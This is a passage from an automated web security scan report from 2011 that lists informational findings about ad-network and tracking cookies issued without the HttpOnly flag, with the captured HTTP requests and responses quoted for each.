Set-Cookie: oatmeal=10070:256698:477674:54816:0:1295977917:3|10489:276818:522556:54393:0:1296277238:0|; domain=.fastclick.net; path=/; expires=Mon, 28-Feb-2011 05:00:38 GMT
Set-Cookie: adv_ic=...[SNIP]...; domain=.fastclick.net; path=/; expires=Sun, 29-Jan-2012 05:00:38 GMT
Set-Cookie: pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Mon, 28-Jan-2013 05:00:38 GMT
Keep-Alive: timeout=5, max=19972
Connection: Keep-Alive


11.445. http://media.fastclick.net/w/get.media

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/get.media

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (the cookie names are visible in the Set-Cookie headers of the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/get.media?sid=54393&tp=5&d=j&t=n HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; vt=10070:256698:477674:54816:0:1295925050:3|10358:244443:513092:57358:0:1296072859:0|; pjw=BAMAAAACIAMDXNVATSAGCAABAQAA/EgCACAG4AAAAAMgCQHPpqAfICwAwCAP4AMfAAYgDwDHwB8gGATrdAIAUyATwAADBgAAAA==; adv_ic=ByoAAABc1UBNIAYGAAFJAABkOCAHIAtAAAGbgOABFwGpSOABFwEes6AXAEOAFwBgQCwgAAKSDT/gAEcBsF3gAS8AvcAXIC8EG1kAAHYgK0AAAI7AFyB3AJAgF8B3AIvgAhcEzU8AAANALCAAAHfgAhcAJyBpwC8AcuACFwD84AKnAG3gAhcBdlzgAS8AaOACFwDkIHvARwBi4AIXATte4AEXAF3gAhcBLlHgARcAWuACFwEbWOABFwBV4AIXAUdT4AEXAFDgAhcAo+ECHwBG4AIXAObgAhcAReACFwElW+ABRwA84AIXAPvgAl8AN+ACFwEGTOABLwAz4AIXAdZL4AEXAC/gAhcAnuACXwAu4AIXAB/hAgcAKuACFwA34AKnACbgAhcAD+ACLwAg4AIXAALgAl8AHOACFwFVWuABjwAW4AIXAQpQ4AEXAAPgAhcAGOACXwH+DOIBbwC34AJHANzgAhcAxuACFwDY4AIXACjgAkcA0+ACFwDV4gInAM/gAhcAZeMCFwDI4AIXAR9W4AGnAMTgAhcAFeACXwC/4AIXAD/gAhcAsOACFwHbV+ABRwCr4AIXAXlH4AEXAKjgAhcAoOACRwCA4AIXAMwiDwACIytAAAI7Pz4jJSA/IuNDdwCRIAsDAAAAAA==; pluto=517004695355|v1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:43:52 GMT
Content-Type: application/x-javascript
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 405
Set-Cookie: pjw=BAEAAAACIAMDqEZDTSAGAQABIAMCUjkEYAcCPPkHIA1AEwEAAA==; domain=.fastclick.net; path=/; expires=Sun, 30-Jan-2011 22:43:52 GMT
Set-Cookie: vt=10070:256698:477674:54816:0:1295925050:3|10489:276818:522556:54393:0:1296254632:0|; domain=.fastclick.net; path=/; expires=Sun, 27-Feb-2011 22:43:52 GMT
Set-Cookie: adv_ic=BxMAAACoRkNNIAYGAAFJAAACWyAHIAtAAAJc1UDgABcBZDjgARcBHrOgFwdDAACpSAAAYEAsIAACvQ0/gC8gFwQbWQAAdiATQAAAi8AXIF8EzU8AAANAFCAAAG3gAhcBdlzgAV8AVeACFwFHU+ABFwA34AIXAQZM4AEXADPgAhcB1kvgARcAJuACFwEPXuABFwAD4AIXABjgAhcB/gygvyCnAbda4AEvANzgAhcAxuACFwDY4AIXACjgAkcA0+ACFwDV4ALXAMTgAhcAFeACLwCr4AIXAXlH4AF3AKjgAhcAoOACLwI7Pz6BZyCnQWcAkSFLAwAAAAA=; domain=.fastclick.net; path=/; expires=Sat, 28-Jan-2012 22:43:52 GMT
Set-Cookie: pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Sun, 27-Jan-2013 22:43:52 GMT

{var dz=document;
dz.writeln("<iframe src=\"http://view.atdmt.com/AVE/iview/286758469/direct;wi.728;hi.90/01/20110128224352/?click=http://media.fastclick.net/w/click.here?cid=276818;mid=522556;m=1;sid
...[SNIP]...

11.446. http://mig.nexac.com/2/B3DM/DLX/1@x96

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mig.nexac.com
Path:   /2/B3DM/DLX/1@x96

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (the cookie name is visible in the Set-Cookie header of the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/DLX/1@x96 HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y; OAX=rcHW800+KPMAAfCd

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:14:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1391
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}

if((cookie_check(
...[SNIP]...

11.447. http://mx.imlive.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mx.imlive.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (the cookie names are visible in the Set-Cookie headers of the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: mx.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=wytymorw54fw1s453wwi1b45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wytymorw54fw1s453wwi1b45; path=/; HttpOnly
Set-Cookie: spvdr=vd=a13018e7-4eaf-491b-9a58-2a08ebf5d10b&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:13 GMT; path=/
Set-Cookie: imx=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:13 GMT
Connection: close
Content-Length: 18291
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-MX" lang="es-MX" d
...[SNIP]...

11.448. http://mx.imlive.com/waccess/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mx.imlive.com
Path:   /waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (the cookie names are visible in the Set-Cookie headers of the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: mx.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=sxush3arzywpwe3sm4uhu1yz; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=sxush3arzywpwe3sm4uhu1yz; path=/; HttpOnly
Set-Cookie: spvdr=vd=3d17b217-23ca-40af-aeff-340528322852&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:14 GMT; path=/
Set-Cookie: imx=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: pmx=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 14:25:14 GMT; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:13 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


11.449. http://na.link.decdna.net/n/49881/49889/www.247realmedia.com/1ykg1it

Summary

Severity:   Information
Confidence:   Certain
Host:   http://na.link.decdna.net
Path:   /n/49881/49889/www.247realmedia.com/1ykg1it

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (the cookie names are visible in the Set-Cookie headers of the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /n/49881/49889/www.247realmedia.com/1ykg1it;11;3;;6;;8rue07;;;;;1;/i/c?0&pq=%2fEN%2dUS%2f&1pixgif&referer= HTTP/1.1
Host: na.link.decdna.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 14:16:08 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Expires: Fri, 28 Jan 2011 14:16:08 GMT
location: http://na.link.decdna.net/n/49881/49889/www.247realmedia.com/1ykg1it;11;3;;6;;8rue07;;;;;1;/i/c?0&0&pq=%2fEN%2dUS%2f&1pixgif&referer=&bounced
Set-Cookie: %2edecdna%2enet/%2fn%2f49881/2/e=1296224168/49881/49889/0/0//0///0/0/0/0///0/0//0//0/0; expires=Sun, 27-Feb-2011 14:16:08 GMT; path=/n/49881; domain=.decdna.net;
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS COM NAV INT"
Set-Cookie: id=9286424825562137129; expires=Sat, 28-Jan-2012 14:16:08 GMT; path=/; domain=.decdna.net;
Set-Cookie: name=9286424825511805852; path=/; domain=.decdna.net;
Content-Length: 0
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


11.450. http://network.realmedia.com/3/bostonherald/ros/728x90/jx/ss/a/L31@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /3/bostonherald/ros/728x90/jx/ss/a/L31@Top1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (the cookie name is visible in the Set-Cookie header of the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/bostonherald/ros/728x90/jx/ss/a/L31@Top1 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:05:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1021
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:06:22 GMT;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; var zf
...[SNIP]...

11.451. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (the cookie names are visible in the Set-Cookie headers of the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1/ HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:02:21 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFL=011Pj2x3U10EfJ|U10Eo1|U10yOK|U1014lt|U10166E; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 414
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:03:21 GMT;path=/

document.write ('<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/434939665/UNKNOWN/USNetwork/BCN2010040564_000_EmpireState/1x1trans.gif/72634857383
...[SNIP]...

11.452. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1065387053@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1065387053@Top1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (the cookie names are visible in the Set-Cookie headers of the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1065387053@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O8016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:27:11 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O9016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3623
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:18:14 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...

11.453. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1068587247@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1068587247@Top1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (the cookie names are visible in the Set-Cookie headers of the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1068587247@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O1012Mr|O1016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:46 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O1012Mr|O2016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3623
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:48:48 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...

11.454. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1089179764@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1089179764@Top1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (the cookie names are visible in the Set-Cookie headers of the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1089179764@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O1012Mr|O2016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:03 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O1012Mr|O3016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3623
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:49:06 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...

11.455. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1104028281@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1104028281@Top1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (the cookie names are visible in the Set-Cookie headers of the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1104028281@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; mm247=AL0LE0AS0SE0CA0OP0DO0CR0BR0CO0MO0PE0PR0PU0SP0SU0DI0EX0OM0DY0RS0; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiQmF81012Mr|O1016GB; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:37 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O1016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3623
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:48:40 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...

11.456. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1105447520@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1105447520@Top1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (the cookie names are visible in the Set-Cookie headers of the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1105447520@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O3016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:09 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O4016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
